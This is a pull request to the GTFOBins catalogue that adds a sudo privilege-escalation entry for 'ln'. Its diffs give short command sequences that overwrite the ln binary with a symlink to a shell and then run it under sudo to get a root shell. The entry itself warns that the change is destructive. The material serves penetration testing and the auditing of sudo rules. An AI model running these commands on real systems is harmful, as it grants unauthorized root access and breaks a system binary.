### PR TITLE
Add sudo using ln (symlink)

### DIFF
--- a/_gtfobins/ln.md
+++ b/_gtfobins/ln.md
@@ -1,0 +1,11 @@
+---
+description: If we have sudo rights to run synlink (ln) we can link bash to ln and run bash as root
+functions:
+  sudo:
+    - code: |
+        echo 'bash' > /tmp/bash
+        chmod +x /tmp/bash
+        sudo /usr/bin/ln -sf /tmp/bash /usr/bin/ln
+        sudo /usr/bin/ln
+        
+---

--- a/_gtfobins/ln.md
+++ b/_gtfobins/ln.md
@@ -1,5 +1,5 @@
 ---
-description: If we have sudo rights to run synlink (ln) we can link bash to ln and run bash as root
+description: If we have sudo privileges to run synlink (ln) we can link bash to ln and run bash as root
 functions:
   sudo:
     - code: |

--- a/_gtfobins/ln.md
+++ b/_gtfobins/ln.md
@@ -1,11 +1,8 @@
 ---
-description: If we have sudo privileges to run synlink (ln) we can link bash to ln and run bash as root
+description: This overrides `ln` itself with a symlink to a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `ln` by path. Warning, this is a destructive action.
 functions:
   sudo:
     - code: |
-        echo 'bash' > /tmp/bash
-        chmod +x /tmp/bash
-        sudo /usr/bin/ln -sf /tmp/bash /usr/bin/ln
-        sudo /usr/bin/ln
-        
+        sudo ln -fs /bin/sh /bin/ln
+        sudo ln
 ---


### PR DESCRIPTION
I recently came across a situation where I saw we can run /usr/bin/ln with sudo , so we can create a file having it to execute bash and symlink it to the symlink binary in this way we can execute bash with sudo and become root.